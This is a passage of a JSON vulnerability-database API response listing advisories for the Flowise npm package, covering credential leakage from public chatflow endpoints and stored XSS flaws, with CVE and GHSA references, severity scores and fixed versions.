                    "reference_id": "CVE-2025-58434",
                    "reference_type": "exploit",
                    "scores": [],
                    "url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/typescript/webapps/52557.py"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-wgpv-6j63-x5ph",
                    "reference_id": "GHSA-wgpv-6j63-x5ph",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-wgpv-6j63-x5ph"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph",
                    "reference_id": "GHSA-wgpv-6j63-x5ph",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-12T18:10:37Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/34612?format=api",
                    "purl": "pkg:npm/flowise@3.0.6",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-39aw-3gc6-bkgb"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-488c-vrqu-f7hf"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-6ufs-d346-d7ev"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-9bht-svq8-87b4"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-abyp-yn76-1yfp"
                        },
                        {
                            "vulnerability": "VCID-affy-v76q-fub6"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dtss-epth-z7fh"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-jcze-eg2c-mkcf"
                        },
                        {
                            "vulnerability": "VCID-jmps-anck-eqdt"
                        },
                        {
                            "vulnerability": "VCID-k579-xd81-hqdu"
                        },
                        {
                            "vulnerability": "VCID-ksmv-s6c9-t7ap"
                        },
                        {
                            "vulnerability": "VCID-m3j3-4u39-euht"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-qgs1-hazv-67b8"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-ywgu-76cy-uqe7"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        },
                        {
                            "vulnerability": "VCID-zwz7-byj4-6qan"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6"
                }
            ],
            "aliases": [
                "CVE-2025-58434",
                "GHSA-wgpv-6j63-x5ph"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zbrd-qdty-2bfs"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80707?format=api",
            "vulnerability_id": "VCID-zwna-stj5-3yhm",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the GET /api/v1/public-chatflows/:id endpoint returns the full chatflow object without sanitization for public chatflows. Docker validation revealed this is worse than initially assessed: the sanitizeFlowDataForPublicEndpoint function does NOT exist in the released v3.0.13 Docker image. Both public-chatflows AND public-chatbotConfig return completely raw flowData including credential IDs, plaintext API keys, and password-type fields. This vulnerability is fixed in 3.1.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41278",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10461",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41278"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41278",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41278"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-w47f-j8rh-wx87",
                    "reference_id": "GHSA-w47f-j8rh-wx87",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-w47f-j8rh-wx87"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-w47f-j8rh-wx87",
                    "reference_id": "GHSA-w47f-j8rh-wx87",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:39:44Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-w47f-j8rh-wx87"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "CVE-2026-41278",
                "GHSA-w47f-j8rh-wx87"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zwna-stj5-3yhm"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212281?format=api",
            "vulnerability_id": "VCID-zwz7-byj4-6qan",
            "summary": "Flowise vulnerable to XSS",
            "references": [
                {
                    "reference_url": "https://github.com/advisories/GHSA-4fr9-3x69-36wv",
                    "reference_id": "GHSA-4fr9-3x69-36wv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-4fr9-3x69-36wv"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-4fr9-3x69-36wv",
                    "reference_id": "GHSA-4fr9-3x69-36wv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-4fr9-3x69-36wv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/34082?format=api",
                    "purl": "pkg:npm/flowise@3.0.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-488c-vrqu-f7hf"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-6ufs-d346-d7ev"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-9bht-svq8-87b4"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-affy-v76q-fub6"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dtss-epth-z7fh"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-jcze-eg2c-mkcf"
                        },
                        {
                            "vulnerability": "VCID-k579-xd81-hqdu"
                        },
                        {
                            "vulnerability": "VCID-ksmv-s6c9-t7ap"
                        },
                        {
                            "vulnerability": "VCID-m3j3-4u39-euht"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-ywgu-76cy-uqe7"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.8"
                }
            ],
            "aliases": [
                "GHSA-4fr9-3x69-36wv"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zwz7-byj4-6qan"
        }
    ],
    "fixing_vulnerabilities": [
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212283?format=api",
            "vulnerability_id": "VCID-rkaz-75t9-r3gs",
            "summary": "Duplicate Advisory: Flowise is vulnerable to stored XSS via \"View Messages\", allowing credential theft in the FlowiseAI admin panel",
            "references": [
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50538",
                    "reference_id": "CVE-2025-50538",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50538"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-7rgr-72hp-9wp3",
                    "reference_id": "GHSA-7rgr-72hp-9wp3",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-7rgr-72hp-9wp3"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-964p-j4gg-mhwc",
                    "reference_id": "GHSA-964p-j4gg-mhwc",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-964p-j4gg-mhwc"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/34083?format=api",
                    "purl": "pkg:npm/flowise@3.0.5",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-39aw-3gc6-bkgb"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-488c-vrqu-f7hf"
                        },
                        {
                            "vulnerability": "VCID-5hdy-fsnn-qfgq"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-6ufs-d346-d7ev"
                        },
                        {
                            "vulnerability": "VCID-6wat-8akx-hycz"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-8vsg-mxay-gkf7"
                        },
                        {
                            "vulnerability": "VCID-9bht-svq8-87b4"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-abyp-yn76-1yfp"
                        },
                        {
                            "vulnerability": "VCID-affy-v76q-fub6"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dtss-epth-z7fh"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fje6-knjc-nfgf"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-g7y6-euhd-jqhh"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-jcze-eg2c-mkcf"
                        },
                        {
                            "vulnerability": "VCID-jmps-anck-eqdt"
                        },
                        {
                            "vulnerability": "VCID-k579-xd81-hqdu"
                        },
                        {
                            "vulnerability": "VCID-ksmv-s6c9-t7ap"
                        },
                        {
                            "vulnerability": "VCID-m3j3-4u39-euht"
                        },
                        {
                            "vulnerability": "VCID-n77p-4nu7-2yb4"
                        },
                        {
                            "vulnerability": "VCID-pg5c-6y4s-h3cq"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-qgs1-hazv-67b8"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-t839-eydz-1ud4"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-wt2v-e5sa-n3g8"
                        },
                        {
                            "vulnerability": "VCID-ywgu-76cy-uqe7"
                        },
                        {
                            "vulnerability": "VCID-zbrd-qdty-2bfs"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        },
                        {
                            "vulnerability": "VCID-zwz7-byj4-6qan"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.5"
                }
            ],
            "aliases": [
                "GHSA-7rgr-72hp-9wp3"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rkaz-75t9-r3gs"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212282?format=api",
            "vulnerability_id": "VCID-t5jg-qrw2-aqcv",
            "summary": "Duplicate Advisory: Flowise Stored XSS vulnerability through logs in chatbot",
            "references": [
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29192",
                    "reference_id": "CVE-2025-29192",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29192"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7r4h-vmj9-wg42",
                    "reference_id": "GHSA-7r4h-vmj9-wg42",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7r4h-vmj9-wg42"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-wq95-wr7m-26h4",
                    "reference_id": "GHSA-wq95-wr7m-26h4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-wq95-wr7m-26h4"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/34083?format=api",
                    "purl": "pkg:npm/flowise@3.0.5",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-39aw-3gc6-bkgb"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-488c-vrqu-f7hf"
                        },
                        {
                            "vulnerability": "VCID-5hdy-fsnn-qfgq"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-6ufs-d346-d7ev"
                        },
                        {
                            "vulnerability": "VCID-6wat-8akx-hycz"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-8vsg-mxay-gkf7"
                        },
                        {
                            "vulnerability": "VCID-9bht-svq8-87b4"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-abyp-yn76-1yfp"
                        },
                        {
                            "vulnerability": "VCID-affy-v76q-fub6"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dtss-epth-z7fh"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fje6-knjc-nfgf"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-g7y6-euhd-jqhh"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-jcze-eg2c-mkcf"
                        },
                        {
                            "vulnerability": "VCID-jmps-anck-eqdt"
                        },
                        {
                            "vulnerability": "VCID-k579-xd81-hqdu"
                        },
                        {
                            "vulnerability": "VCID-ksmv-s6c9-t7ap"
                        },
                        {
                            "vulnerability": "VCID-m3j3-4u39-euht"
                        },
                        {
                            "vulnerability": "VCID-n77p-4nu7-2yb4"
                        },
                        {
                            "vulnerability": "VCID-pg5c-6y4s-h3cq"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-qgs1-hazv-67b8"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-t839-eydz-1ud4"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-wt2v-e5sa-n3g8"
                        },
                        {
                            "vulnerability": "VCID-ywgu-76cy-uqe7"
                        },
                        {
                            "vulnerability": "VCID-zbrd-qdty-2bfs"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        },
                        {
                            "vulnerability": "VCID-zwz7-byj4-6qan"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.5"
                }
            ],
            "aliases": [
                "GHSA-wq95-wr7m-26h4"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-t5jg-qrw2-aqcv"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/108868?format=api",
            "vulnerability_id": "VCID-wg28-w8vn-ybb5",
            "summary": "Flowise before 3.0.5 allows XSS via a FORM element and an INPUT element when an admin views the chat log.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-29192",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0006",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19091",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-29192"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/commit/9a06a85a8ddcbaeca1342827a5fea9087a587d97",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/commit/9a06a85a8ddcbaeca1342827a5fea9087a587d97"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/pull/4905",
                    "reference_id": "4905",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-06T13:54:28Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/pull/4905"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29192",
                    "reference_id": "CVE-2025-29192",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29192"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.5",
                    "reference_id": "flowise%403.0.5",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-06T13:54:28Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.5"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-7r4h-vmj9-wg42",
                    "reference_id": "GHSA-7r4h-vmj9-wg42",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-7r4h-vmj9-wg42"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7r4h-vmj9-wg42",
                    "reference_id": "GHSA-7r4h-vmj9-wg42",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
